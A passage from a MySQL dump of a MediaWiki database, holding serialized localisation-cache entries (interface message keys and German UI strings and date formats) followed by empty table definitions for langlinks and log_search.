3401;s:45:\"wikieditor-toolbar-help-content-indent-result\";i:3402;s:7:\"sidebar\";i:3403;s:18:\"pagecategorieslink\";i:3404;s:25:\"categoryviewer-pagedlinks\";i:3405;s:9:\"sitetitle\";i:3406;s:12:\"sitesubtitle\";i:3407;s:10:\"addsection\";i:3408;s:14:\"talkpageheader\";i:3409;s:12:\"edithelppage\";i:3410;s:8:\"helppage\";i:3411;s:23:\"pagetitle-view-mainpage\";i:3412;s:16:\"backlinksubtitle\";i:3413;s:16:\"newtalkseparator\";i:3414;s:9:\"feed-atom\";i:3415;s:8:\"feed-rss\";i:3416;s:10:\"sitenotice\";i:3417;s:10:\"anonnotice\";i:3418;s:28:\"newsectionheaderdefaultlevel\";i:3419;s:14:\"mainpage-nstab\";i:3420;s:23:\"createacct-helpusername\";i:3421;s:11:\"loginprompt\";i:3422;s:18:\"userlogout-summary\";i:3423;s:13:\"helplogin-url\";i:3424;s:18:\"userlogin-loggedin\";i:3425;s:23:\"userlogin-createanother\";i:3426;s:26:\"createacct-imgcaptcha-help\";i:3427;s:24:\"createacct-benefit-icon1\";i:3428;s:24:\"createacct-benefit-head1\";i:3429;s:24:\"createacct-benefit-icon2\";i:3430;s:24:\"createacct-benefit-head2\";i:3431;s:24:\"createacct-benefit-icon3\";i:3432;s:24:\"createacct-benefit-head3\";i:3433;s:17:\"nocookiesforlogin\";i:3434;s:15:\"passwordtoolong\";i:3435;s:10:\"loginstart\";i:3436;s:8:\"loginend\";i:3437;s:14:\"loginend-https\";i:3438;s:11:\"signupstart\";i:3439;s:9:\"signupend\";i:3440;s:15:\"signupend-https\";i:3441;s:11:\"emailsender\";i:3442;s:18:\"loginlanguagelinks\";i:3443;s:15:\"pear-mail-error\";i:3444;s:14:\"php-mail-error\";i:3445;s:22:\"changepassword-summary\";i:3446;s:19:\"changeemail-summary\";i:3447;s:19:\"resettokens-summary\";i:3448;s:18:\"newarticletextanon\";i:3449;s:12:\"talkpagetext\";i:3450;s:17:\"noarticletextanon\";i:3451;s:23:\"editpage-head-copy-warn\";i:3452;s:20:\"editpage-tos-summary\";i:3453;s:13:\"longpage-hint\";i:3454;s:16:\"edittools-upload\";i:3455;s:18:\"addsection-preload\";i:3456;s:20:\"addsection-editintro\";i:3457;s:26:\"createaccount-hook-aborted\";i:3458;s:21:\"revision-info-current\";i:3459;s:12:\"revision-nav\";i:3460;s:17:\"history_copyright\";i:3461;s:24:\"mergehistory-revisionrow\";i:3462;s:14:\"search-summary\";i:3463;s:23:\"searchmenu-new-nocreate\";i:3464;s:23:\"search-interwiki-custom\";i:3465;s:12:\"googlesearch\";i:3466;s:15:\"opensearch-desc\";i:3467;s:19:\"preferences-summary\";i:3468;s:18:\"userrights-summary\";i:3469;s:30:\"userrights-irreversible-marker\";i:3470;s:22:\"right-editcontentmodel\";i:3471;s:23:\"action-editcontentmodel\";i:3472;s:17:\"recentchanges-url\";i:3473;s:17:\"recentchangestext\";i:3474;s:26:\"recentchanges-legend-minor\";i:3475;s:24:\"recentchanges-legend-bot\";i:3476;s:32:\"recentchanges-legend-unpatrolled\";i:3477;s:17:\"unpatrolledletter\";i:3478;s:31:\"number_of_watching_users_RCview\";i:3479;s:14:\"upload-summary\";i:3480;s:12:\"uploadfooter\";i:3481;s:26:\"upload-default-description\";i:3482;s:13:\"uploadedimage\";i:3483;s:14:\"overwroteimage\";i:3484;s:8:\"licenses\";i:3485;s:24:\"shareddescriptionfollows\";i:3486;s:33:\"shared-repo-name-wikimediacommons\";i:3487;s:22:\"unwatchedpages-summary\";i:3488;s:21:\"listredirects-summary\";i:3489;s:23:\"unusedtemplates-summary\";i:3490;s:14:\"randompage-url\";i:3491;s:18:\"statistics-summary\";i:3492;s:17:\"statistics-footer\";i:3493;s:21:\"pageswithprop-summary\";i:3494;s:23:\"doubleredirects-summary\";i:3495;s:23:\"brokenredirects-summary\";i:3496;s:23:\"fewestrevisions-summary\";i:3497;s:19:\"lonelypages-summary\";i:3498;s:26:\"uncategorizedpages-summary\";i:3499;s:31:\"uncategorizedcategories-summary\";i:3500;s:27:\"uncategorizedimages-summary\";i:3501;s:30:\"uncategorizedtemplates-summary\";i:3502;s:24:\"unusedcategories-summary\";i:3503;s:20:\"unusedimages-summary\";i:3504;s:20:\"popularpages-summary\";i:3505;s:24:\"wantedcategories-summary\";i:3506;s:19:\"wantedpages-summary\";i:3507;s:19:\"wantedfiles-summary\";i:3508;s:23:\"wantedtemplates-summary\";i:3509;s:18:\"mostlinked-summary\";i:3510;s:28:\"mostlinkedcategories-summary\";i:3511;s:27:\"mostlinkedtemplates-summary\";i:3512;s:22:\"mostcategories-summary\";i:3513;s:18:\"mostimages-summary\";i:3514;s:22:\"mostinterwikis-summary\";i:3515;s:21:\"mostrevisions-summary\";i:3516;s:19:\"prefixindex-summary\";i:3517;s:18:\"shortpages-summary\";i:3518;s:17:\"longpages-summary\";i:3519;s:20:\"deadendpages-summary\";i:3520;s:29:\"protectedpages-unknown-reason\";i:3521;s:17:\"listusers-summary\";i:3522;s:16:\"newpages-summary\";i:3523;s:20:\"ancientpages-summary\";i:3524;s:19:\"booksources-summary\";i:3525;s:16:\"booksources-isbn\";i:3526;s:6:\"rfcurl\";i:3527;s:9:\"pubmedurl\";i:3528;s:16:\"allpages-summary\";i:3529;s:18:\"categories-summary\";i:3530;s:28:\"deletedcontributions-summary\";i:3531;s:18:\"linksearch-summary\";i:3532;s:19:\"activeusers-summary\";i:3533;s:29:\"listgrouprights-right-display\";i:3534;s:29:\"listgrouprights-right-revoked\";i:3535;s:17:\"emailuser-summary\";i:3536;s:17:\"watchlist-summary\";i:3537;s:20:\"protect-summary-desc\";i:3538;s:16:\"undelete-summary\";i:3539;s:21:\"undelete-revision-row\";i:3540;s:21:\"contributions-summary\";i:3541;s:24:\"sp-contributions-explain\";i:3542;s:23:\"sp-contributions-footer\";i:3543;s:28:\"sp-contributions-footer-anon\";i:3544;s:31:\"sp-contributions-footer-newbies\";i:3545;s:21:\"whatlinkshere-summary\";i:3546;s:15:\"unblock-summary\";i:3547;s:17:\"blocklist-summary\";i:3548;s:5:\"sorbs\";i:3549;s:18:\"ipb-default-expiry\";i:3550;s:16:\"movepage-summary\";i:3551;s:18:\"move-redirect-text\";i:3552;s:31:\"category-move-redirect-override\";i:3553;s:14:\"export-summary\";i:3554;s:14:\"import-summary\";i:3555;s:23:\"javascripttest-backlink\";i:3556;s:37:\"javascripttest-pagetext-unknownaction\";i:3557;s:25:\"javascripttest-qunit-name\";i:3558;s:21:\"accesskey-pt-userpage\";i:3559;s:25:\"accesskey-pt-anonuserpage\";i:3560;s:19:\"accesskey-pt-mytalk\";i:3561;s:21:\"accesskey-pt-anontalk\";i:3562;s:24:\"accesskey-pt-preferences\";i:3563;s:22:\"accesskey-pt-watchlist\";i:3564;s:22:\"accesskey-pt-mycontris\";i:3565;s:18:\"accesskey-pt-login\";i:3566;s:19:\"accesskey-pt-logout\";i:3567;s:17:\"accesskey-ca-talk\";i:3568;s:17:\"accesskey-ca-edit\";i:3569;s:23:\"accesskey-ca-addsection\";i:3570;s:23:\"accesskey-ca-viewsource\";i:3571;s:20:\"accesskey-ca-history\";i:3572;s:20:\"accesskey-ca-protect\";i:3573;s:22:\"accesskey-ca-unprotect\";i:3574;s:19:\"accesskey-ca-delete\";i:3575;s:21:\"accesskey-ca-undelete\";i:3576;s:17:\"accesskey-ca-move\";i:3577;s:18:\"accesskey-ca-watch\";i:3578;s:20:\"accesskey-ca-unwatch\";i:3579;s:16:\"accesskey-search\";i:3580;s:19:\"accesskey-search-go\";i:3581;s:25:\"accesskey-search-fulltext\";i:3582;s:16:\"accesskey-p-logo\";i:3583;s:20:\"accesskey-n-mainpage\";i:3584;s:32:\"accesskey-n-mainpage-description\";i:3585;s:18:\"accesskey-n-portal\";i:3586;s:25:\"accesskey-n-currentevents\";i:3587;s:25:\"accesskey-n-recentchanges\";i:3588;s:22:\"accesskey-n-randompage\";i:3589;s:16:\"accesskey-n-help\";i:3590;s:25:\"accesskey-t-whatlinkshere\";i:3591;s:31:\"accesskey-t-recentchangeslinked\";i:3592;s:18:\"accesskey-feed-rss\";i:3593;s:19:\"accesskey-feed-atom\";i:3594;s:25:\"accesskey-t-contributions\";i:3595;s:21:\"accesskey-t-emailuser\";i:3596;s:21:\"accesskey-t-permalink\";i:3597;s:17:\"accesskey-t-print\";i:3598;s:18:\"accesskey-t-upload\";i:3599;s:24:\"accesskey-t-specialpages\";i:3600;s:23:\"accesskey-ca-nstab-main\";i:3601;s:23:\"accesskey-ca-nstab-user\";i:3602;s:24:\"accesskey-ca-nstab-media\";i:3603;s:26:\"accesskey-ca-nstab-special\";i:3604;s:26:\"accesskey-ca-nstab-project\";i:3605;s:24:\"accesskey-ca-nstab-image\";i:3606;s:28:\"accesskey-ca-nstab-mediawiki\";i:3607;s:27:\"accesskey-ca-nstab-template\";i:3608;s:23:\"accesskey-ca-nstab-help\";i:3609;s:27:\"accesskey-ca-nstab-category\";i:3610;s:19:\"accesskey-minoredit\";i:3611;s:14:\"accesskey-save\";i:3612;s:17:\"accesskey-preview\";i:3613;s:14:\"accesskey-diff\";i:3614;s:33:\"accesskey-compareselectedversions\";i:3615;s:15:\"accesskey-watch\";i:3616;s:16:\"accesskey-upload\";i:3617;s:26:\"accesskey-preferences-save\";i:3618;s:17:\"accesskey-summary\";i:3619;s:24:\"accesskey-userrights-set\";i:3620;s:23:\"accesskey-blockip-block\";i:3621;s:16:\"accesskey-export\";i:3622;s:16:\"accesskey-import\";i:3623;s:37:\"accesskey-watchlistedit-normal-submit\";i:3624;s:34:\"accesskey-watchlistedit-raw-submit\";i:3625;s:33:\"interlanguage-link-title-langonly\";i:3626;s:36:\"interlanguage-link-title-nonlangonly\";i:3627;s:15:\"pageinfo-header\";i:3628;s:15:\"pageinfo-footer\";i:3629;s:19:\"markaspatrolledlink\";i:3630;s:11:\"widthheight\";i:3631;s:13:\"newimagestext\";i:3632;s:10:\"video-dims\";i:3633;s:14:\"seconds-abbrev\";i:3634;s:14:\"minutes-abbrev\";i:3635;s:12:\"hours-abbrev\";i:3636;s:11:\"days-abbrev\";i:3637;s:8:\"today-at\";i:3638;s:19:\"variantname-zh-hans\";i:3639;s:19:\"variantname-zh-hant\";i:3640;s:17:\"variantname-zh-cn\";i:3641;s:17:\"variantname-zh-tw\";i:3642;s:17:\"variantname-zh-hk\";i:3643;s:17:\"variantname-zh-mo\";i:3644;s:17:\"variantname-zh-sg\";i:3645;s:17:\"variantname-zh-my\";i:3646;s:14:\"variantname-zh\";i:3647;s:20:\"variantname-gan-hans\";i:3648;s:20:\"variantname-gan-hant\";i:3649;s:15:\"variantname-gan\";i:3650;s:17:\"variantname-sr-ec\";i:3651;s:17:\"variantname-sr-el\";i:3652;s:14:\"variantname-sr\";i:3653;s:17:\"variantname-kk-kz\";i:3654;s:17:\"variantname-kk-tr\";i:3655;s:17:\"variantname-kk-cn\";i:3656;s:19:\"variantname-kk-cyrl\";i:3657;s:19:\"variantname-kk-latn\";i:3658;s:19:\"variantname-kk-arab\";i:3659;s:14:\"variantname-kk\";i:3660;s:19:\"variantname-ku-arab\";i:3661;s:19:\"variantname-ku-latn\";i:3662;s:14:\"variantname-ku\";i:3663;s:19:\"variantname-tg-cyrl\";i:3664;s:19:\"variantname-tg-latn\";i:3665;s:14:\"variantname-tg\";i:3666;s:20:\"variantname-ike-cans\";i:3667;s:20:\"variantname-ike-latn\";i:3668;s:14:\"variantname-iu\";i:3669;s:20:\"variantname-shi-tfng\";i:3670;s:20:\"variantname-shi-latn\";i:3671;s:15:\"variantname-shi\";i:3672;s:14:\"variantname-uz\";i:3673;s:19:\"variantname-uz-latn\";i:3674;s:19:\"variantname-uz-cyrl\";i:3675;s:17:\"metadata-langitem\";i:3676;s:25:\"metadata-langitem-default\";i:3677;s:19:\"exif-fnumber-format\";i:3678;s:23:\"exif-focallength-format\";i:3679;s:22:\"exif-coordinate-format\";i:3680;s:15:\"exif-make-value\";i:3681;s:16:\"exif-model-value\";i:3682;s:19:\"exif-software-value\";i:3683;s:27:\"exif-software-version-value\";i:3684;s:18:\"exif-contact-value\";i:3685;s:26:\"exif-subjectnewscode-value\";i:3686;s:18:\"exif-compression-5\";i:3687;s:18:\"exif-compression-6\";i:3688;s:18:\"exif-compression-7\";i:3689;s:18:\"exif-compression-8\";i:3690;s:22:\"exif-compression-32773\";i:3691;s:22:\"exif-compression-32946\";i:3692;s:22:\"exif-compression-34712\";i:3693;s:32:\"exif-photometricinterpretation-2\";i:3694;s:32:\"exif-photometricinterpretation-6\";i:3695;s:19:\"exif-xyresolution-i\";i:3696;s:19:\"exif-xyresolution-c\";i:3697;s:17:\"exif-colorspace-1\";i:3698;s:30:\"exif-componentsconfiguration-1\";i:3699;s:30:\"exif-componentsconfiguration-2\";i:3700;s:30:\"exif-componentsconfiguration-3\";i:3701;s:30:\"exif-componentsconfiguration-4\";i:3702;s:30:\"exif-componentsconfiguration-5\";i:3703;s:30:\"exif-componentsconfiguration-6\";i:3704;s:19:\"exif-lightsource-20\";i:3705;s:19:\"exif-lightsource-21\";i:3706;s:19:\"exif-lightsource-22\";i:3707;s:19:\"exif-lightsource-23\";i:3708;s:27:\"exif-maxaperturevalue-value\";i:3709;s:10:\"unit-pixel\";i:3710;s:19:\"semicolon-separator\";i:3711;s:15:\"comma-separator\";i:3712;s:15:\"colon-separator\";i:3713;s:18:\"autocomment-prefix\";i:3714;s:14:\"pipe-separator\";i:3715;s:14:\"word-separator\";i:3716;s:11:\"parentheses\";i:3717;s:8:\"brackets\";i:3718;s:12:\"img-lang-opt\";i:3719;s:19:\"autoblock_whitelist\";i:3720;s:14:\"size-kilobytes\";i:3721;s:14:\"size-terabytes\";i:3722;s:14:\"size-petabytes\";i:3723;s:13:\"size-exabytes\";i:3724;s:14:\"size-zetabytes\";i:3725;s:15:\"size-yottabytes\";i:3726;s:12:\"bitrate-bits\";i:3727;s:16:\"bitrate-kilobits\";i:3728;s:16:\"bitrate-megabits\";i:3729;s:16:\"bitrate-gigabits\";i:3730;s:16:\"bitrate-terabits\";i:3731;s:16:\"bitrate-petabits\";i:3732;s:15:\"bitrate-exabits\";i:3733;s:16:\"bitrate-zetabits\";i:3734;s:17:\"bitrate-yottabits\";i:3735;s:21:\"editwatchlist-summary\";i:3736;s:19:\"iranian-calendar-m1\";i:3737;s:19:\"iranian-calendar-m2\";i:3738;s:19:\"iranian-calendar-m3\";i:3739;s:19:\"iranian-calendar-m4\";i:3740;s:19:\"iranian-calendar-m5\";i:3741;s:19:\"iranian-calendar-m6\";i:3742;s:19:\"iranian-calendar-m7\";i:3743;s:19:\"iranian-calendar-m8\";i:3744;s:19:\"iranian-calendar-m9\";i:3745;s:20:\"iranian-calendar-m10\";i:3746;s:20:\"iranian-calendar-m11\";i:3747;s:20:\"iranian-calendar-m12\";i:3748;s:17:\"hijri-calendar-m1\";i:3749;s:17:\"hijri-calendar-m2\";i:3750;s:17:\"hijri-calendar-m9\";i:3751;s:18:\"hebrew-calendar-m1\";i:3752;s:18:\"hebrew-calendar-m2\";i:3753;s:18:\"hebrew-calendar-m3\";i:3754;s:18:\"hebrew-calendar-m4\";i:3755;s:18:\"hebrew-calendar-m5\";i:3756;s:18:\"hebrew-calendar-m6\";i:3757;s:19:\"hebrew-calendar-m6a\";i:3758;s:19:\"hebrew-calendar-m6b\";i:3759;s:18:\"hebrew-calendar-m7\";i:3760;s:18:\"hebrew-calendar-m8\";i:3761;s:18:\"hebrew-calendar-m9\";i:3762;s:19:\"hebrew-calendar-m10\";i:3763;s:19:\"hebrew-calendar-m11\";i:3764;s:19:\"hebrew-calendar-m12\";i:3765;s:22:\"hebrew-calendar-m1-gen\";i:3766;s:22:\"hebrew-calendar-m2-gen\";i:3767;s:22:\"hebrew-calendar-m3-gen\";i:3768;s:22:\"hebrew-calendar-m4-gen\";i:3769;s:22:\"hebrew-calendar-m5-gen\";i:3770;s:22:\"hebrew-calendar-m6-gen\";i:3771;s:23:\"hebrew-calendar-m6a-gen\";i:3772;s:23:\"hebrew-calendar-m6b-gen\";i:3773;s:22:\"hebrew-calendar-m7-gen\";i:3774;s:22:\"hebrew-calendar-m8-gen\";i:3775;s:22:\"hebrew-calendar-m9-gen\";i:3776;s:23:\"hebrew-calendar-m10-gen\";i:3777;s:23:\"hebrew-calendar-m11-gen\";i:3778;s:23:\"hebrew-calendar-m12-gen\";i:3779;s:14:\"signature-anon\";i:3780;s:12:\"timezone-utc\";i:3781;s:15:\"version-summary\";i:3782;s:20:\"version-db-mysql-url\";i:3783;s:22:\"version-db-mariadb-url\";i:3784;s:22:\"version-db-percona-url\";i:3785;s:23:\"version-db-postgres-url\";i:3786;s:21:\"version-db-oracle-url\";i:3787;s:21:\"version-db-sqlite-url\";i:3788;s:20:\"version-db-mssql-url\";i:3789;s:29:\"version-entrypoints-index-php\";i:3790;s:27:\"version-entrypoints-api-php\";i:3791;s:28:\"version-entrypoints-load-php\";i:3792;s:13:\"redirect-text\";i:3793;s:20:\"specialpages-summary\";i:3794;s:12:\"tags-summary\";i:3795;s:20:\"comparepages-summary\";i:3796;s:18:\"revdelete-logentry\";i:3797;s:18:\"logdelete-logentry\";i:3798;s:17:\"revdelete-content\";i:3799;s:17:\"revdelete-summary\";i:3800;s:15:\"revdelete-uname\";i:3801;s:13:\"revdelete-hid\";i:3802;s:15:\"revdelete-unhid\";i:3803;s:21:\"revdelete-log-message\";i:3804;s:21:\"logdelete-log-message\";i:3805;s:14:\"deletedarticle\";i:3806;s:17:\"suppressedarticle\";i:3807;s:16:\"undeletedarticle\";i:3808;s:15:\"patrol-log-line\";i:3809;s:15:\"patrol-log-auto\";i:3810;s:15:\"patrol-log-diff\";i:3811;s:9:\"1movedto2\";i:3812;s:15:\"1movedto2_redir\";i:3813;s:24:\"move-redirect-suppressed\";i:3814;s:23:\"newuserlog-create-entry\";i:3815;s:24:\"newuserlog-create2-entry\";i:3816;s:27:\"newuserlog-autocreate-entry\";i:3817;s:14:\"rightslogentry\";i:3818;s:26:\"rightslogentry-autopromote\";i:3819;s:40:\"limitreport-expensivefunctioncount-value\";i:3820;s:34:\"expand_templates_preview_fail_html\";i:3821;s:39:\"expand_templates_preview_fail_html_anon\";i:3822;s:22:\"mediastatistics-nfiles\";i:3823;s:24:\"json-warn-trailing-comma\";i:3824;s:18:\"json-error-unknown\";i:3825;s:16:\"json-error-depth\";i:3826;s:25:\"json-error-state-mismatch\";i:3827;s:20:\"json-error-ctrl-char\";i:3828;s:17:\"json-error-syntax\";i:3829;s:15:\"json-error-utf8\";i:3830;s:20:\"json-error-recursion\";i:3831;s:21:\"json-error-inf-or-nan\";i:3832;s:27:\"json-error-unsupported-type\";i:3833;s:42:\"wikieditor-toolbar-tool-table-example-text\";i:3834;s:50:\"wikieditor-toolbar-help-content-rereference-syntax\";i:3835;s:53:\"wikieditor-toolbar-help-content-showreferences-syntax\";i:3836;s:57:\"wikieditor-toolbar-help-content-signaturetimestamp-syntax\";i:3837;s:48:\"wikieditor-toolbar-help-content-signature-syntax\";}}'),('de','preload','a:3:{s:8:\"messages\";a:104:{s:9:\"aboutpage\";s:26:\"Project:Über_{{SITENAME}}\";s:9:\"aboutsite\";s:18:\"Über {{SITENAME}}\";s:17:\"accesskey-ca-edit\";s:1:\"e\";s:20:\"accesskey-ca-history\";s:1:\"h\";s:23:\"accesskey-ca-nstab-main\";s:1:\"c\";s:17:\"accesskey-ca-talk\";s:1:\"t\";s:17:\"accesskey-ca-view\";N;s:25:\"accesskey-n-currentevents\";s:0:\"\";s:16:\"accesskey-n-help\";s:0:\"\";s:32:\"accesskey-n-mainpage-description\";s:1:\"z\";s:18:\"accesskey-n-portal\";s:0:\"\";s:22:\"accesskey-n-randompage\";s:1:\"x\";s:25:\"accesskey-n-recentchanges\";s:1:\"r\";s:16:\"accesskey-p-logo\";s:0:\"\";s:18:\"accesskey-pt-login\";s:1:\"o\";s:16:\"accesskey-search\";s:1:\"f\";s:25:\"accesskey-search-fulltext\";s:0:\"\";s:19:\"accesskey-search-go\";s:0:\"\";s:21:\"accesskey-t-permalink\";s:0:\"\";s:31:\"accesskey-t-recentchangeslinked\";s:1:\"k\";s:24:\"accesskey-t-specialpages\";s:1:\"q\";s:25:\"accesskey-t-whatlinkshere\";s:1:\"j\";s:7:\"actions\";s:8:\"Aktionen\";s:10:\"anonnotice\";s:1:\"-\";s:13:\"currentevents\";s:19:\"Aktuelle Ereignisse\";s:17:\"currentevents-url\";s:27:\"Project:Aktuelle Ereignisse\";s:14:\"disclaimerpage\";s:17:\"Project:Impressum\";s:11:\"disclaimers\";s:9:\"Impressum\";s:4:\"edit\";s:10:\"Bearbeiten\";s:11:\"editsection\";s:10:\"Bearbeiten\";s:15:\"editsectionhint\";s:24:\"Abschnitt bearbeiten: $1\";s:4:\"help\";s:5:\"Hilfe\";s:8:\"helppage\";s:63:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Contents\";s:24:\"interlanguage-link-title\";s:9:\"$1 – $2\";s:6:\"jumpto\";s:12:\"Wechseln zu:\";s:16:\"jumptonavigation\";s:10:\"Navigation\";s:12:\"jumptosearch\";s:5:\"Suche\";s:14:\"lastmodifiedat\";s:52:\"Diese Seite wurde zuletzt am $1 um $2 Uhr geändert.\";s:8:\"mainpage\";s:10:\"Hauptseite\";s:20:\"mainpage-description\";s:10:\"Hauptseite\";s:14:\"mainpage-nstab\";s:0:\"\";s:10:\"namespaces\";s:12:\"Namensräume\";s:10:\"navigation\";s:10:\"Navigation\";s:23:\"nav-login-createaccount\";s:34:\"Anmelden / Benutzerkonto erstellen\";s:10:\"nstab-main\";s:5:\"Seite\";s:10:\"nstab-talk\";N;s:15:\"opensearch-desc\";s:34:\"{{SITENAME}} ({{CONTENTLANGUAGE}})\";s:14:\"pagecategories\";s:34:\"{{PLURAL:$1|Kategorie|Kategorien}}\";s:18:\"pagecategorieslink\";s:18:\"Special:Categories\";s:9:\"pagetitle\";s:19:\"$1 – {{SITENAME}}\";s:23:\"pagetitle-view-mainpage\";s:12:\"{{SITENAME}}\";s:9:\"permalink\";s:16:\"Permanenter Link\";s:13:\"personaltools\";s:15:\"Meine Werkzeuge\";s:6:\"portal\";s:19:\"Gemeinschaftsportal\";s:10:\"portal-url\";s:27:\"Project:Gemeinschaftsportal\";s:16:\"printableversion\";s:12:\"Druckversion\";s:7:\"privacy\";s:11:\"Datenschutz\";s:11:\"privacypage\";s:19:\"Project:Datenschutz\";s:10:\"randompage\";s:16:\"Zufällige Seite\";s:14:\"randompage-url\";s:14:\"Special:Random\";s:13:\"recentchanges\";s:18:\"Letzte Änderungen\";s:27:\"recentchangeslinked-toolbox\";s:32:\"Änderungen an verlinkten Seiten\";s:17:\"recentchanges-url\";s:21:\"Special:RecentChanges\";s:13:\"retrievedfrom\";s:12:\"Von „$1“\";s:6:\"search\";s:5:\"Suche\";s:13:\"searcharticle\";s:5:\"Seite\";s:12:\"searchbutton\";s:6:\"Suchen\";s:7:\"sidebar\";s:158:\"\n* navigation\n** mainpage|mainpage-description\n** recentchanges-url|recentchanges\n** randompage-url|randompage\n** helppage|help\n* SEARCH\n* TOOLBOX\n* LANGUAGES\";s:18:\"navigation-heading\";s:16:\"Navigationsmenü\";s:14:\"site-atom-feed\";s:23:\"Atom-Feed für „$1“\";s:10:\"sitenotice\";s:1:\"-\";s:12:\"specialpages\";s:13:\"Spezialseiten\";s:7:\"tagline\";s:16:\"Aus {{SITENAME}}\";s:4:\"talk\";s:10:\"Diskussion\";s:7:\"toolbox\";s:9:\"Werkzeuge\";s:15:\"tooltip-ca-edit\";s:72:\"Seite bearbeiten. Bitte vor dem Speichern die Vorschaufunktion benutzen.\";s:18:\"tooltip-ca-history\";s:31:\"Frühere Versionen dieser Seite\";s:21:\"tooltip-ca-nstab-main\";s:21:\"Seiteninhalt anzeigen\";s:15:\"tooltip-ca-talk\";s:27:\"Diskussion zum Seiteninhalt\";s:15:\"tooltip-ca-view\";N;s:23:\"tooltip-n-currentevents\";s:49:\"Hintergrundinformationen zu aktuellen Ereignissen\";s:14:\"tooltip-n-help\";s:19:\"Hilfeseite anzeigen\";s:30:\"tooltip-n-mainpage-description\";s:19:\"Hauptseite besuchen\";s:16:\"tooltip-n-portal\";s:58:\"Über das Projekt, was du tun kannst, wo was zu finden ist\";s:20:\"tooltip-n-randompage\";s:25:\"Zufällige Seite aufrufen\";s:23:\"tooltip-n-recentchanges\";s:45:\"Liste der letzten Änderungen in {{SITENAME}}\";s:14:\"tooltip-p-logo\";s:10:\"Hauptseite\";s:20:\"tooltip-p-navigation\";N;s:12:\"tooltip-p-tb\";N;s:16:\"tooltip-pt-login\";s:64:\"Sich anzumelden wird zwar gerne gesehen, ist aber keine Pflicht.\";s:14:\"tooltip-search\";s:24:\"{{SITENAME}} durchsuchen\";s:23:\"tooltip-search-fulltext\";s:44:\"Suche nach Seiten, die diesen Text enthalten\";s:17:\"tooltip-search-go\";s:70:\"Gehe direkt zu der Seite, die exakt dem eingegebenen Namen entspricht.\";s:19:\"tooltip-t-permalink\";s:40:\"Dauerhafter Link zu dieser Seitenversion\";s:29:\"tooltip-t-recentchangeslinked\";s:56:\"Letzte Änderungen an Seiten, die von hier verlinkt sind\";s:22:\"tooltip-t-specialpages\";s:25:\"Liste aller Spezialseiten\";s:23:\"tooltip-t-whatlinkshere\";s:41:\"Liste aller Seiten, die hierher verlinken\";s:8:\"variants\";s:9:\"Varianten\";s:16:\"vector-view-edit\";s:10:\"Bearbeiten\";s:19:\"vector-view-history\";s:18:\"Versionsgeschichte\";s:16:\"vector-view-view\";s:5:\"Lesen\";s:9:\"viewcount\";s:63:\"Diese Seite wurde bisher {{PLURAL:$1|einmal|$1 mal}} abgerufen.\";s:5:\"views\";s:9:\"Ansichten\";s:13:\"whatlinkshere\";s:21:\"Links auf diese Seite\";}s:11:\"dateFormats\";a:26:{s:9:\"dmyt time\";s:3:\"H:i\";s:9:\"dmyt date\";s:6:\"j. F Y\";s:9:\"dmyt both\";s:11:\"j. M Y, H:i\";s:10:\"dmyts time\";s:5:\"H:i:s\";s:10:\"dmyts date\";s:6:\"j. F Y\";s:10:\"dmyts both\";s:13:\"j. M Y, H:i:s\";s:8:\"dmy time\";s:3:\"H:i\";s:8:\"dmy date\";s:6:\"j. F Y\";s:8:\"dmy both\";s:11:\"H:i, j. M Y\";s:8:\"ymd time\";s:3:\"H:i\";s:8:\"ymd date\";s:5:\"Y M j\";s:8:\"ymd both\";s:10:\"H:i, Y M j\";s:13:\"ISO 8601 time\";s:11:\"xnH:xni:xns\";s:13:\"ISO 8601 date\";s:11:\"xnY-xnm-xnd\";s:13:\"ISO 8601 both\";s:25:\"xnY-xnm-xnd\"T\"xnH:xni:xns\";s:8:\"mdy time\";s:3:\"H:i\";s:8:\"mdy date\";s:6:\"F j, Y\";s:13:\"mdy monthonly\";s:3:\"F Y\";s:8:\"mdy both\";s:11:\"H:i, F j, Y\";s:10:\"mdy pretty\";s:3:\"F j\";s:13:\"dmy monthonly\";s:3:\"F Y\";s:10:\"dmy pretty\";s:3:\"j F\";s:13:\"ymd monthonly\";s:3:\"Y F\";s:10:\"ymd pretty\";s:3:\"F j\";s:18:\"ISO 8601 monthonly\";s:7:\"xnY-xnm\";s:15:\"ISO 8601 pretty\";s:7:\"xnm-xnd\";}s:14:\"namespaceNames\";a:17:{i:-2;s:6:\"Medium\";i:-1;s:7:\"Spezial\";i:1;s:10:\"Diskussion\";i:2;s:8:\"Benutzer\";i:3;s:19:\"Benutzer_Diskussion\";i:5;s:13:\"$1_Diskussion\";i:6;s:5:\"Datei\";i:7;s:16:\"Datei_Diskussion\";i:8;s:9:\"MediaWiki\";i:9;s:20:\"MediaWiki_Diskussion\";i:10;s:7:\"Vorlage\";i:11;s:18:\"Vorlage_Diskussion\";i:12;s:5:\"Hilfe\";i:13;s:16:\"Hilfe_Diskussion\";i:14;s:9:\"Kategorie\";i:15;s:20:\"Kategorie_Diskussion\";i:0;s:0:\"\";}}'); /*!40000 ALTER TABLE `l10n_cache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `langlinks` -- DROP TABLE IF EXISTS `langlinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `langlinks` ( `ll_from` int(10) unsigned NOT NULL DEFAULT '0', `ll_lang` varbinary(20) NOT NULL DEFAULT '', `ll_title` varbinary(255) NOT NULL DEFAULT '', UNIQUE KEY `ll_from` (`ll_from`,`ll_lang`), KEY `ll_lang` (`ll_lang`,`ll_title`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `langlinks` -- LOCK TABLES `langlinks` WRITE; /*!40000 ALTER TABLE `langlinks` DISABLE KEYS */; /*!40000 ALTER TABLE `langlinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `log_search` -- DROP TABLE IF EXISTS `log_search`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `log_search` ( `ls_field` varbinary(32) NOT NULL, `ls_value` varbinary(255) NOT NULL, `ls_log_id` int(10) unsigned NOT NULL DEFAULT '0', UNIQUE KEY `ls_field_val` (`ls_field`,`ls_value`,`ls_log_id`), KEY `ls_log_id` (`ls_log_id`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `log_search` -- LOCK TABLES `log_search` WRITE; /*!40000 ALTER TABLE `log_search` DISABLE KEYS */; /*!40000 ALTER TABLE `log_search` ENABLE KEYS */; UNLOCK 